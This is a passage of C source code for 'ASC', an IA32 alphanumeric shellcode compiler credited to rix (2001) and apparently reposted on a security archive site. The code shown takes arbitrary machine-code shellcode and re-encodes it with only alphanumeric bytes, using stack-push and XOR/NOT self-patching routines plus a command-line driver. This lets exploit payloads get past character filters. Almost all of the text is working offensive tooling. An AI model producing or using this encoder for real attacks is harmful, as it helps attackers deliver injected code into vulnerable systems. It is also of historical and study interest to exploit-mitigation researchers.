  reg=alphanumeric_get_register(M_EDX|M_EBX|M_ESI|M_EDI);
  if (category==CATEGORY_00) INCr(s,reg); /* inc r16 =>r16=0*/
  switch(size) {
  case 1:
   O16(s);PUSHr(s,reg); /* push r16 */
   INCr(s,ESP);         /* inc esp */
   break;
  case 2:
   O16(s);PUSHr(s,reg); /* push r16 */
   break;
  case 3:
   PUSHr(s,reg); /* push r32 */
   INCr(s,ESP);  /* inc esp */
   break;
  case 4:
   PUSHr(s,reg); /* push r32 */
   break;
  }
  if (category==CATEGORY_00) DECr(s,reg); /* dec r16 =>r16=FFFFFFFF */
  break;

 case CATEGORY_ALPHA:
 case CATEGORY_ALPHA_NOT:
  switch(size) {
  case 1:
   PUSHw(s,WORD(SB1,alphanumeric_get_byte())); /* push SB1 */
   INCr(s,ESP);                                /* inc esp */
   break;
  case 2:
   PUSHw(s,WORD(SB1,SB2)); /* push SB1 SB2 */
   break;
  case 3:
   PUSHd(s,DWORD(SB1,SB2,SB3,alphanumeric_get_byte())); /* push SB1 SB2 SB3 */
   INCr(s,ESP);                                         /* inc esp */
   break;
  case 4:
   PUSHd(s,DWORD(SB1,SB2,SB3,SB4)); /* push SB1 SB2 SB3 SB4 */
   break;
  }
  break;

 case CATEGORY_XOR:
 case CATEGORY_XOR_NOT:
  switch(size) {
  case 1:
   xSB1=alphanumeric_get_complement(SB1);
   PUSHw(s,WORD(XOR(SB1,xSB1),alphanumeric_get_byte())); /* push ~xSB1 */
   O16(s);POPr(s,EAX);                           /* pop ax */
   XOR_AX(s,WORD(xSB1,alphanumeric_get_byte())); /* xor ax,xSB1 =>EAX=SB1 */
   O16(s);PUSHr(s,EAX);                          /* push ax */
   INCr(s,ESP);                                  /* inc esp */
   break;
  case 2:
   xSB1=alphanumeric_get_complement(SB1);
   xSB2=alphanumeric_get_complement(SB2);
   PUSHw(s,WORD(XOR(SB1,xSB1),XOR(SB2,xSB2))); /* push ~xSB1 ~xSB2 */
   O16(s);POPr(s,EAX);        /* pop ax */
   XOR_AX(s,WORD(xSB1,xSB2)); /* xor ax,xSB1 xSB2 =>EAX=SB1 SB2 */
   O16(s);PUSHr(s,EAX);       /* push ax */
   break;
  case 3:
   xSB1=alphanumeric_get_complement(SB1);
   xSB2=alphanumeric_get_complement(SB2);
   xSB3=alphanumeric_get_complement(SB3);
   PUSHd(s,DWORD(XOR(SB1,xSB1),XOR(SB2,xSB2),XOR(SB3,xSB3),alphanumeric_get_byte())); /* push ~xSB1 ~xSB2 ~xSB3 */
   POPr(s,EAX);                                              /* pop eax */
   XOR_EAX(s,DWORD(xSB1,xSB2,xSB3,alphanumeric_get_byte())); /* xor eax,xSB1 xSB2 xSB3 =>EAX=SB1 SB2 SB3 */
   PUSHr(s,EAX);                                             /* push eax */
   INCr(s,ESP);                                              /* inc esp */
   break;
  case 4:
   xSB1=alphanumeric_get_complement(SB1);
   xSB2=alphanumeric_get_complement(SB2);
   xSB3=alphanumeric_get_complement(SB3);
   xSB4=alphanumeric_get_complement(SB4);
   PUSHd(s,DWORD(XOR(SB1,xSB1),XOR(SB2,xSB2),XOR(SB3,xSB3),XOR(SB4,xSB4))); /* push ~xSB1 ~xSB2 ~xSB3 ~xSB4 */
   POPr(s,EAX);                           /* pop eax */
   XOR_EAX(s,DWORD(xSB1,xSB2,xSB3,xSB4)); /* xor eax,xSB1 xSB2 xSB3 xSB4 =>EAX=SB1 SB2 SB3 SB4 */
   PUSHr(s,EAX);                          /* push eax */
   break;
  }
  break;
 }

 /* possibly realize a NOT on the stack */
 if ((category==CATEGORY_ALPHA_NOT)||(category==CATEGORY_XOR_NOT)) alphanumeric_stack_generate_not(s,size);

 return 0;
}


/* generate the original shellcode on the stack */
/* ============================================ */
int alphanumeric_stack_generate(struct Sshellcode *output,struct Sshellcode *input) {
 int category,size,i;

 if (input==NULL) return -1;
 if (output==NULL) return -1;

 i=input->size-1;
 while (i>=0) { /* loop from the right to the left of our original shellcode */
  category=alphanumeric_stack_get_category(input->opcodes[i]);
  size=1; /* by default, we have 1 byte of the same category */

  /* loop until maximum 3 previous bytes are from the same category */
  while ((i-size>=0)&&(size<4)&&(alphanumeric_stack_get_category(input->opcodes[i-size])==category)) size++;

  /* write those bytes on the stack */
  alphanumeric_stack_generate_push(output,category,&input->opcodes[i-size+1],size);

  i-=size;
 }
 return 0;
}

/* +------------------------------------------------------------------------+ */
/* |                       PATCHES MANIPULATIONS FUNCTIONS                  | */
/* +------------------------------------------------------------------------+ */

/* return the category of the byte */
/* =============================== */
int alphanumeric_patches_get_category(unsigned char c) {
 if (alphanumeric_check(c)) return CATEGORY_ALPHA;
 else if (c<0x80) return CATEGORY_XOR;
 else { /* need a NOT */
  c=NOT(c);
  if (alphanumeric_check(c)) return CATEGORY_ALPHA_NOT;
  else return CATEGORY_XOR_NOT;
 }
}


/* generate the patches initialization shellcode */
/* ============================================ */
int alphanumeric_patches_generate_initialization(struct Sshellcode *shellcode,int patcher_size,int alpha_begin,int base,unsigned char disp8) {
 struct Sshellcode *s;
 int offset; /* real offset for original shellcode to patch */
 struct Sshellcode *p_offset; /* offset "shellcode" */
 int fill_size; /* size to add to the initialization shellcode to align */
 int initialization_size,i;

 if (shellcode==NULL) return -1;

 initialization_size=0;
 while(1) { /* loop until we create a valid initialization shellcode */
  s=shellcode_malloc();
  fill_size=0;

  PUSHr(s,alphanumeric_get_register(M_REGISTERS));  /* push r32 =>EAX */
  PUSHr(s,alphanumeric_get_register(M_REGISTERS));  /* push r32 =>ECX */
  PUSHr(s,alphanumeric_get_register(M_EDX|M_EBX|M_ESI|M_EDI)); /* push FFFFFFFF =>EDX */
  if (base==EBX) {
   PUSHr(s,EBP);                                    /* push ebp =>EBX */
  }
  else {
   PUSHr(s,alphanumeric_get_register(M_REGISTERS)); /* push r32 =>EBX */
  }
  PUSHr(s,alphanumeric_get_register(M_REGISTERS));  /* push r32 =>ESP */

  offset=shellcode->size+initialization_size+patcher_size+alpha_begin-disp8; /* calculate the real offset */

  /* if the offset is not correct we must modify the size of our initialization shellcode */
  if (offset<0) { /* align to have a positive offset */
   fill_size=-offset;
   offset=0;
  }
  if (offset&1) { /* align for the 2*ebp */
   fill_size++;
   offset++;
  }
  offset/=2;

  p_offset=shellcode_malloc();
  DB(p_offset,BYTE(offset,0));
  DB(p_offset,BYTE(offset,1));
  DB(p_offset,BYTE(offset,2));
  DB(p_offset,BYTE(offset,3));
  alphanumeric_stack_generate(s,p_offset);          /* push offset => EBP */
  shellcode_free(p_offset);

  PUSHr(s,alphanumeric_get_register(M_EDX|M_EBX|M_ESI|M_EDI)); /* push FFFFFFFF =>ESI */
  if (base==EDI) {
   PUSHr(s,EBP);                                    /* push ebp =>EDI */
  }
  else {
   PUSHr(s,alphanumeric_get_register(M_REGISTERS)); /* push r32 =>EDI */
  }
  POPAD(s);                                         /* popad */

  if (s->size<=initialization_size) break; /* if the offset is good */

  initialization_size++;
 }
 /* the offset is good */

 /* fill to reach the initialization_size value */
 while (s->size<initialization_size) INCr(s,ECX);
 /* fill to reach the offset value */
 for (i=0;i<fill_size;i++) INCr(s,ECX);

 shellcode_cat(shellcode,s);
 shellcode_free(s);
 return 0;
}


/* generate the xor patch */
/* ====================== */
#define PB1 bytes[0]
#define PB2 bytes[1]
#define PB3 bytes[2]
#define PB4 bytes[3]

int alphanumeric_patches_generate_xor(struct Sshellcode *s,int category,unsigned char *bytes,int size,int base,char disp8) {
 unsigned char xPB1,xPB2,xPB3,xPB4;
 int reg,i;

 if (s==NULL) return -1;

 /* eventually realize a NOT on bytes[] */
 if ((category==CATEGORY_ALPHA_NOT)||(category==CATEGORY_XOR_NOT)) {
  for (i=0;i<size;i++) bytes[i]=NOT(bytes[i]);
 }

  /* generate the bytes in the original shellcode */
 switch(category) {
 case CATEGORY_ALPHA:
 case CATEGORY_ALPHA_NOT:
  /* nothing to do */
  break;
 case CATEGORY_XOR:
 case CATEGORY_XOR_NOT:
  reg=alphanumeric_get_register(M_EAX|M_ECX);
  switch(size) {
  case 1:
   xPB1=alphanumeric_get_complement(PB1);
   PUSHb(s,XOR(PB1,xPB1));        /* push ~xPB1 */
   POPr(s,reg);                   /* pop reg */
   PB1=xPB1;                      /* modify into the original shellcode */
   XORsib8(s,base,EBP,disp8,reg); /* xor [base+2*ebp+disp8],reg => xor xPB1,~xPB1 */
   break;
  case 2:
   xPB1=alphanumeric_get_complement(PB1);
   xPB2=alphanumeric_get_complement(PB2);
   PUSHw(s,WORD(XOR(PB2,xPB2),XOR(PB1,xPB1))); /* push ~xPB2 ~xPB1 */
   O16(s);POPr(s,reg); /* pop reg */
   PB1=xPB1;           /* modify into the original shellcode */
   PB2=xPB2;
   O16(s);XORsib32(s,base,EBP,disp8,reg); /* xor [base+2*ebp+disp8],reg => xor xPB2 xPB1,~xPB2 ~xPB1 */
   break;
  case 4:
   xPB1=alphanumeric_get_complement(PB1);
   xPB2=alphanumeric_get_complement(PB2);
   xPB3=alphanumeric_get_complement(PB3);
   xPB4=alphanumeric_get_complement(PB4);
   PUSHd(s,DWORD(XOR(PB4,xPB4),XOR(PB3,xPB3),XOR(PB2,xPB2),XOR(PB1,xPB1))); /* push ~xPB4 ~xPB3 ~xPB2 ~xPB1 */
   POPr(s,reg); /* pop reg */
   PB1=xPB1;    /* modify into the original shellcode */
   PB2=xPB2;
   PB3=xPB3;
   PB4=xPB4;
   XORsib32(s,base,EBP,disp8,reg); /* xor [base+2*ebp+disp8],reg => xor xPB4 xPB3 xPB2 xPB1,~xPB4 ~xPB3 ~xPB2 ~xPB1 */
   break;
  }
  break;
 }

 /* eventually realize a NOT on the shellcode */
 if ((category==CATEGORY_ALPHA_NOT)||(category==CATEGORY_XOR_NOT)) {
  reg=alphanumeric_get_register(M_EDX|M_ESI);
  switch(size) {
  case 1:
   XORsib8(s,base,EBP,disp8,reg); /* xor [base+2*ebp+disp8],dl/dh */
   break;
  case 2:
   O16(s);XORsib32(s,base,EBP,disp8,reg); /* xor [base+2*ebp+disp8],dx/si */
   break;
  case 4:
   XORsib32(s,base,EBP,disp8,reg); /* xor [base+2*ebp+disp8],edx/esi */
   break;
  }
 }

 return 0;
}


/* generate the patch and the original shellcode */
/* ============================================= */
int alphanumeric_patches_generate(struct Sshellcode *output,struct Sshellcode *input) {
 struct Sshellcode *out,*in; /* input and output codes */
 struct Sshellcode *best; /* last best shellcode */
 struct Sshellcode *patcher; /* patches code */
 int alpha_begin,alpha_end; /* offsets of the patchable part */
 int base; /* base register */
 unsigned char *disp8_begin; /* pointer to the current first disp8 */
 unsigned char disp8;
 int category,size,i,j;

 if (input==NULL) return -1;
 if (output==NULL) return -1;

 /* get the offset of the first and last non alphanumeric bytes */
 for (alpha_begin=0;alpha_begin<input->size;alpha_begin++) {
  if (!alphanumeric_check(input->opcodes[alpha_begin])) break;
 }
 if (alpha_begin>=input->size) { /* if patching is not needed */
  shellcode_cat(output,input);
  return 0;
 }
 for (alpha_end=input->size-1;alpha_end>alpha_begin;alpha_end--) {
  if (!alphanumeric_check(input->opcodes[alpha_end])) break;
 }

 base=alphanumeric_get_register(M_EBX|M_EDI);
 best=shellcode_malloc();
 disp8_begin=ALPHANUMERIC_BYTES;

 while (*disp8_begin!=0) { /* loop for all possible disp8 values */
  disp8=*disp8_begin;

  /* allocate all shellcodes */
  out=shellcode_malloc();
  shellcode_cpy(out,output);
  in=shellcode_malloc();
  shellcode_cpy(in,input);
  patcher=shellcode_malloc();

  i=alpha_begin;
  size=0;
  while (i<=alpha_end) { /* loop into our original shellcode */
   /* increment the offset if needed */
   for (j=0;j<size;j++) {
    if (alphanumeric_check(disp8+1)) {
     disp8++;
    }
    else INCr(patcher,base); /* inc base */
   }

   category=alphanumeric_patches_get_category(in->opcodes[i]);
   size=1; /* by default, we have 1 byte of the same category */

   /* loop until maximum 3 next bytes are from the same category */
   while ((i+size<=alpha_end)&&(size<4)&&(alphanumeric_patches_get_category(in->opcodes[i+size])==category)) size++;
   if (size==3) size=2; /* impossible to XOR 3 bytes */

   /* patch those bytes */
   alphanumeric_patches_generate_xor(patcher,category,&in->opcodes[i],size,base,disp8);

   i+=size;
  }

  alphanumeric_patches_generate_initialization(out,patcher->size,alpha_begin,base,*disp8_begin); /* create a valid initialization shellcode */

  shellcode_cat(out,patcher);
  shellcode_cat(out,in);

  if ((best->size==0)||(out->size<best->size)) shellcode_cpy(best,out); /* if this is a more interesting shellcode, we save it */

  /* free all shellcodes and malloc */
  shellcode_free(out);
  shellcode_free(in);
  shellcode_free(patcher);
  disp8_begin++;
 }

 shellcode_cpy(output,best);
 shellcode_free(best);
 return 0;
}

/******************************************************************************/

/* +------------------------------------------------------------------------+ */
/* |                          INTERFACE FUNCTIONS                           | */
/* +------------------------------------------------------------------------+ */

void print_syntax() {
 fprintf(stderr,"ASC - IA32 Alphanumeric Shellcode Compiler\n");
 fprintf(stderr,"==========================================\n");
 fprintf(stderr,"SYNTAX  : asc [options] <input file[.c]>\n");
 fprintf(stderr,"COMPILATION OPTIONS :\n");
 fprintf(stderr," -a[ddress] stack|<r32>     : address of shellcode (default=stack)\n");
 fprintf(stderr," -m[ode] stack|patches      : output shellcode build mode (default=patches)\n");
 fprintf(stderr," -s[tack] call|jmp|null|ret : method to return to original code on the stack\n");
 fprintf(stderr,"                              (default=null)\n");
 fprintf(stderr,"DEBUGGING OPTIONS :\n");
 fprintf(stderr," -debug-start               : breakpoint to start of compiled shellcode\n");
 fprintf(stderr," -debug-build-original      : breakpoint to building of original shellcode\n");
 fprintf(stderr," -debug-build-jump          : breakpoint to building of stack jump code\n");
 fprintf(stderr," -debug-jump                : breakpoint to stack jump\n");
 fprintf(stderr," -debug-original            : breakpoint to start of original shellcode\n");
 fprintf(stderr,"INPUT/OUTPUT OPTIONS :\n");
 fprintf(stderr," -c[har] <char[] name>      : name of C input array (default=first array)\n");
 fprintf(stderr," -f[ormat] bin|c            : output file format (default=bin)\n");
 fprintf(stderr," -o[utput] <output file>    : output file name (default=stdout)\n");



 fprintf(stderr,"\n");
 fprintf(stderr,"ASC 0.9.1                                                    rix@hert.org @2001\n");
 exit(1);
}


void print_error() {
 perror("Error ASC");
 exit(1);
};

/* +------------------------------------------------------------------------+ */
/* |                             MAIN PROGRAM                               | */
/* +------------------------------------------------------------------------+ */

#define STACK REGISTERS+1

#define INPUT_FORMAT_BIN 0
#define INPUT_FORMAT_C 1

#define OUTPUT_FORMAT_BIN 0
#define OUTPUT_FORMAT_C 1

#define OUTPUT_MODE_STACK 0
#define OUTPUT_MODE_PATCHES 1

#define STACK_MODE_CALL 0
#define STACK_MODE_JMP 1
#define STACK_MODE_NULL 2
#define STACK_MODE_RET 3


int main(int argc, char **argv) {
 char *input_filename=NULL,*output_filename=NULL;
 struct Sshellcode *input=NULL,*output=NULL,*stack=NULL;

 char input_format=INPUT_FORMAT_BIN;
 char *input_variable=NULL;
 char address=STACK;
 char output_format=OUTPUT_FORMAT_BIN;
 char output_mode=OUTPUT_MODE_PATCHES;
 char stack_mode=STACK_MODE_NULL;

 int debug_start=0;
 int debug_build_original=0;
 int debug_build_jump=0;
 int debug_jump=0;
 int debug_original=0;

 int ret,l;


 /* command line parameters definition */
 #define SHORT_OPTIONS "a:c:f:m:o:s:"
 struct option long_options[]={
  /* {"name",has_arg,&variable,value} */
  {"address",1,NULL,'a'},
  {"mode",1,NULL,'m'},
  {"stack",1,NULL,'s'},

  {"debug-start",0,&debug_start,1},
  {"debug-build-original",0,&debug_build_original,1},
  {"debug-build-jump",0,&debug_build_jump,1},
  {"debug-jump",0,&debug_jump,1},
  {"debug-original",0,&debug_original,1},

  {"char",1,NULL,'c'},
  {"format",1,NULL,'f'},
  {"output",1,NULL,'o'},

  {0,0,0,0}
 };
 int c;
 int option_index=0;


 /* read command line parameters */
 opterr=0;
 while ((c=getopt_long_only(argc,argv,SHORT_OPTIONS,long_options,&option_index))!=-1) {
  switch (c) {
  case 'a':
   if (!strcmp(optarg,"eax")) address=EAX;
   else if (!strcmp(optarg,"ebx")) address=EBX;
   else if (!strcmp(optarg,"ecx")) address=ECX;
   else if (!strcmp(optarg,"edx")) address=EDX;
   else if (!strcmp(optarg,"esp")) address=ESP;
   else if (!strcmp(optarg,"ebp")) address=EBP;
   else if (!strcmp(optarg,"esi")) address=ESI;
   else if (!strcmp(optarg,"edi")) address=EDI;
   else if (!strcmp(optarg,"stack")) address=STACK;
   else print_syntax();
   break;
  case 'c':
   input_format=INPUT_FORMAT_C;
   input_variable=optarg;
   break;
  case 'f':
   if (!strcmp(optarg,"bin")) output_format=OUTPUT_FORMAT_BIN;
   else if (!strcmp(optarg,"c")) output_format=OUTPUT_FORMAT_C;
   else print_syntax();
   break;
  case 'm':
   if (!strcmp(optarg,"stack")) output_mode=OUTPUT_MODE_STACK;
   else if (!strcmp(optarg,"patches")) output_mode=OUTPUT_MODE_PATCHES;
   else print_syntax();
   break;
  case 'o':
   output_filename=optarg;
   break;
  case 's':
   output_mode=OUTPUT_MODE_STACK;
   if (!strcmp(optarg,"call")) stack_mode=STACK_MODE_CALL;
   else if (!strcmp(optarg,"jmp")) stack_mode=STACK_MODE_JMP;
   else if (!strcmp(optarg,"null")) stack_mode=STACK_MODE_NULL;
   else if (!strcmp(optarg,"ret")) stack_mode=STACK_MODE_RET;
   else print_syntax();
   break;
  case 0: /* long option set variable */
   break;
  case '?': /* error option character */
  case ':': /* error option parameter */
  default:
   print_syntax();
  }
 }

 if (optind+1!=argc) print_syntax(); /* if no input file specified */
 input_filename=argv[optind];
 /* detect the input file format */
 l=strlen(input_filename);
 if ((l>2)&&(input_filename[l-2]=='.')&&(input_filename[l-1]=='c')) input_format=INPUT_FORMAT_C;

 random_initialize();
 input=shellcode_malloc();
 output=shellcode_malloc();


 /* read input file */
 if (debug_original) INT3(input);
 fprintf(stderr,"Reading %s ... ",input_filename);

 switch(input_format) {
 case INPUT_FORMAT_BIN:
  ret=shellcode_read_binary(input,input_filename);
  break;
 case INPUT_FORMAT_C:
  ret=shellcode_read_C(input,input_filename,input_variable);
  break;
 }
 if (ret==-1) {
  fprintf(stderr,"\n");
  print_error();
 }
 if (!debug_original) fprintf(stderr,"(%d bytes)\n",input->size);
 else fprintf(stderr,"(%d bytes)\n",input->size-1);


 if (debug_start) INT3(output);

 /* obtain the shellcode address */
 if (address==STACK) address=alphanumeric_get_address_stack(output);
 alphanumeric_initialize_registers(output,address);

 /* generate the original shellcode */
 if (debug_build_original) INT3(output);
 switch(output_mode) {
 case OUTPUT_MODE_STACK:
  alphanumeric_stack_generate(output,input);

  if (stack_mode!=STACK_MODE_NULL) { /* if jump building needed */
   stack=shellcode_malloc();
   if (debug_jump) INT3(stack);
   switch(stack_mode) {
   case STACK_MODE_CALL:
    CALL_ESP(stack);  /* call esp */
    break;
   case STACK_MODE_JMP:
    JMP_ESP(stack);   /* jmp esp */
    break;
   case STACK_MODE_RET:
    PUSHr(stack,ESP); /* push esp */
    RET(stack);       /* ret */
    break;
   }
   if (debug_build_jump) INT3(output);
   alphanumeric_patches_generate(output,stack);
   shellcode_free(stack);
  }
  else { /* no jump building needed */
   if (debug_jump) INT3(output);
  }
  break;

 case OUTPUT_MODE_PATCHES:
  alphanumeric_patches_generate(output,input);
  break;
 }


 /* print shellcode to the screen */
 fprintf(stderr,"Shellcode (%d bytes):\n",output->size);
 shellcode_print(output);
 fclose(stdout);
 fprintf(stderr,"\n");

 /* write input file */
 if (output_filename) {
  fprintf(stderr,"Writing %s ...\n",output_filename);

  switch(output_format) {
  case OUTPUT_FORMAT_BIN:
   ret=shellcode_write_binary(output,output_filename);
   break;
  case OUTPUT_FORMAT_C:
   ret=shellcode_write_C(output,output_filename);
   break;
  }
  if (ret==-1) {
   shellcode_free(input);
   shellcode_free(output);
   print_error();
  }
 }

 shellcode_free(input);
 shellcode_free(output);
 fprintf(stderr,"Done.\n");
}

/******************************************************************************/
<-->

|EOF|--------------------------------------------------------------------|

AOH Site layout & design copyright © 2006 AOH